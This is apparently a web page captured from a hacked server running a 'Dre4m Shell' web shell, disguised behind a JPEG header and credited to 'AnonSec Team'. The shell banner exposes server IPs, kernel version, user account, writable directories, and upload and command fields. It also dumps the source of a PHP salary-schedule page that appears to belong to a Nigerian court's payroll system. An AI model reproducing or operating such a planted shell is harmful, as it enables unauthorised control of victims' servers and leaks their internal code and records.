ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.142.252.205
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/consolidated/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/consolidated/prt_salary.php
<?php
//require_once('business login/classes/.php');
require_once('business logic/classes/users.php');
require_once('business logic/classes/operations.php');
//
$user = new User();
$oper =new Operations();
//
$uid = $_SESSION['uid'];
$access = $_SESSION['acc'];
//
if (!$user->get_session())
{
   header("location:myown_mainpage.php?you are not login");
}
//
if (isset($_GET['q']) and $_GET['q'] == 'logout') 
{
    $user->user_logout();
    header("location:myown_mainpage.php? you are log out");
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="images/favicon.ico">
<title>National Industrial Court of Nigeria...::...Bank Schedule</title>

<style type="text/css">
<!--
.style25 {	font-family: Verdana, Arial, Helvetica, sans-serif;
	color: #FF0000;
}
a:link {
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: underline;
}
a:active {
	text-decoration: none;
}
.tblborder {
	border-top-width: 1px;
	border-right-width: 1px;
	border-bottom-width: 1px;
	border-left-width: 1px;
	border-top-style: dotted;
	border-right-style: dotted;
	border-bottom-style: dotted;
	border-left-style: dotted;
}

body,td,th {
	font-size: 13px;
	font-family: Verdana, Geneva, sans-serif;
}
-->
</style>
</head>

<body onLoad="lookup();">
<?php
$page_name="prt_salary.php"; //  If you use this code with a different page ( or file ) name then change this 

$type = strtoupper($_SESSION['type']);
$sql = "select * from con_basicsalary";
$rs = mysql_query($sql);
?>
<div align="center">
  <table width="1122" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="3"><div align="center">
<h2>NATIONAL INDUSTRIAL COURT OF NIGERIA<br />
CONSOLIDATED SALARY STRUCTURE</h2>        
      </div></td>
    </tr>    
    <tr>
      <td colspan="3"><table width="1200" border="1" align="center" cellpadding="2" cellspacing="0" class="tblborder">
        <tr>
          <td align="center"><strong>Rank</strong></td>
          <td align="center"><strong>Step</strong></td>
          <td align="center"><strong>Basic</strong></td>
          <td align="center"><strong>Tax</strong></td>
          <td align="center"><strong>Utility</strong></td>
          <td align="center"><strong>Domestic Servant</strong></td>
          <td align="center"><strong>Entertainment</strong></td>
          <td align="center"><strong>Furniture</strong></td>
          <td align="center"><strong>P.A. Allowance</strong></td>
          <td align="center"><strong>Motor<br />Maintainance</strong></td>
          <td align="center"><strong>Hardship</strong></td>
          <td align="center"><strong>Newspaper</strong></td>
          <td align="center"><strong>Outfit</strong></td>
          <td align="center"><strong>Pension</strong></td>
          <td align="center"><strong>NHF</strong></td>
          <td align="center"><strong>Rent Subsidy</strong></td>
          <td align="center"><strong>Leave Bonus</strong></td>
          </tr>
          <?php
		  while($row = mysql_fetch_array($rs))
		  { ?>
          <tr>
          <td align="left"><?php echo $row['employee_rank']; ?></td>
          <td align="left"><?php echo $row['step']; ?></td>
          <td align="left"><?php echo number_format($row['amount'], 2, '.', ','); ?></td>
          <td align="right"><?php echo number_format($row['tax'], 2, '.', ','); ?></td>
          <td align="right"><?php echo number_format($row['utility'], 2, '.', ',') ;?></td>
          <td align="right"><?php echo number_format($row['servant'], 2, '.', ',') ;?></td>
          <td align="right"><?php echo number_format($row['entertainment'], 2, '.', ','); ?></td>
          <td align="right"><?php echo number_format($row['furniture'], 2, '.', ','); ?></td>
          <td align="right"><?php echo number_format($row['pa_allow'], 2, '.', ','); ?></td>
          <td align="right"><?php echo number_format($row['motor_maintain'], 2, '.', ','); ?></td>
          <td align="right"><?php echo number_format($row['hardship'], 2, '.', ','); ?></td>
          <td align="right"><?php echo number_format($row['newspaper'], 2, '.', ','); ?></td>
          <td align="right"><?php echo number_format($row['outfit'], 2, '.', ','); ?></td>
          <td align="right"><?php echo number_format($row['pension'], 2, '.', ','); ?></td>
          <td align="right"><?php echo number_format($row['nhf'], 2, '.', ','); ?></td>
          <td align="right"><?php echo number_format($row['rent_subsidy'], 2, '.', ','); ?></td>
          <td align="right"><?php echo number_format($row['leave_bonus'], 2, '.', ','); ?></td>
          </tr>
        <?php } ?>
      </table>
      
      <table width="1202" border="0" cellpadding="0" cellspacing="0">
        <tr>
          <td width="1181"><div align="center"></div></td>
        </tr>
        <tr>
          <td align="center"><p>&nbsp;</p>
            <p><a href="userArea.php">[Home]</a></p></td>
        </tr>
               
      </table></td>
    </tr>
  </table>
 <form>
    <div align="center"></div>
  </form>
</div>
</body>
</html>
<?php
 $user->close();
 ?>

Anon7 - 2022
AnonSec Team